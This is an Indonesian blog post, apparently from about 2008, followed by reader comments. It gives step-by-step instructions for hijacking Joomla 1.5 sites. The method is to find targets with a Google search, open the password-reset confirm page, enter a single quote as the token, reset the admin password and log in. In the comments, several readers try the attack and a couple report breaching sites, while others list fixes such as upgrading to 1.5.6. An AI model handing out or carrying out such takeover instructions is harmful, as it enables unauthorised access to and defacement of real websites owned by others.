Joomla Sucks
Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.
Berikut ini cara-cara membobol situs berbasis Joomla 1.5.
1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5″ di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing orang.
Sumber: http://milw0rm.com/exploits/6234
Ngeriii !!
ned juned…..
murid anyarmu tah wandi saikie?
ckckckck….
ih wandi nakall..
to all joomla based website admin: hurry up and patch baby!! (udah ada lom patchnya?)
Bapak Saudara Yth. Suwandi Ahmad (Pakar IT)
Sekarang Beralih Menjadi Hacker…..
Nih aku kasih obatnya biar gak suck:
1. rename user
admindengan username lainatau
2. rename folder
administratoratau
3. upgrade ke Joomla versi 1.5.6 http://www.joomla.org/download.html
atau
4. lakukan “hard coding” pada file
reset.phpberes deh !!
*ngibas anduk*
mas iki rek maenan’ne hacker. sangar temen koyok kuburan kasin.
draon rek, ngono njegidek ae. pangeran hacker gitu lho… cantrik, eh muridnya dudi…
*nyarik menyan*
santet wandi ….
Batal deh gue pake joomla buat situs teman gue. Entar gue coba dulu ye. Laporannya menyusul…!
K@#*et! Beneran…! Situsnya bobol. Coba obatnya ah…
Bis… drembis.. saiki dadi ceker.. ehh heker.. ck…ck..ck.. Papi junyet yg ajarin? Dah pagi turu ahh… ZzzZZZzzzzzZZZZZZ Ngrok…ngrok.. tangi awan ahh..
ehmmm…hacker wandi gitu loh…
Waduh… Jangan2 kumpulan orang2 ini yg ada di belakang perang blogger+hacker vs pakar pornomatika… Hua ha ha
gak melok melok ah..
nggak bisa di 1.5.6…saya sudah coba…
ketauan kalo gak pernah update patch kikikii, gak ada yang sempurna mas…, emang situ tahu gimana caranya sql_injection ? lagian scripting kiddies tuh… bukan mainannya hacker, cuma buat penggembira.. lagian kalo emang admin webnya pinter, biar pake CMS apa aja pasti melakukan proteksi ganda… , loe kan cuma ngandalin info di milw0rm dah basi euy…. loe pikir wordpress yang loe pake ini gak bolak-balik di patch terus ma developernya ? malah lebih banyak dari joomla..kikikikii.. berapa kali patch sih kalo gue mo tahu kikikikii…. tp nyatanya tetep aja banyak yang pake kan….. harusnya wp juga suck dong, drupal juga suck dong, gak ada yang sempurna mas. resiko opensource memang begitu tp apa harus mandek sampai disitu trus gak mau pake kikikiki… jangan ngaku orang IT kalo males deh..
lagian adminnya juga bego tuh, atau baru belajar pake trus ngerasa yakin pasti aman ? hehehe…. dari horde mail di cpanel aja bisa di tembus kok ..huahhahaha
kalo mo aman, mending bikin web di local server huahahahhahahah….. makanya men, banyak banyak eksplorasi biar gak gampang suck..huhehhehhe, ntar kalo wp loe ke hack pake kiddy script loe bilang wp suck pula…. dah ah tidur lagi ah….
@sibli
hi hacker! hebat deh. salut saya.
ah ga bisa bung..,…gw isis di toket nya eh di token nya karakter yang berbeda tetap ga bisa..malah muncul pesan “Konfirmasi peresetan kata sandi Anda gagal karena Token salah.” gmn dunk,,,? lanjut lagi gan
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
tolong beri penjelasan ke nomer 2 kenapa stiap karakter yg saya berikan hasilnya nol yah alias ga bisa
Udah report bugs ini ke joomla belum?
ntar saya kirim bantuan dari saya win32.for all yach… sabar yach!!! dunia lagi musimnya iseng ya
belum berhasil, belajar bobol dulu baru bikin web joomlanya….
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
maksudnya beri Karakter gmana?
gk bisa2, ud d coba bbrapa kli juga…
bantu dunk…
Dah tak praktekkan dan BERHASIL BERHASIL 1 Web kebobol dengan baik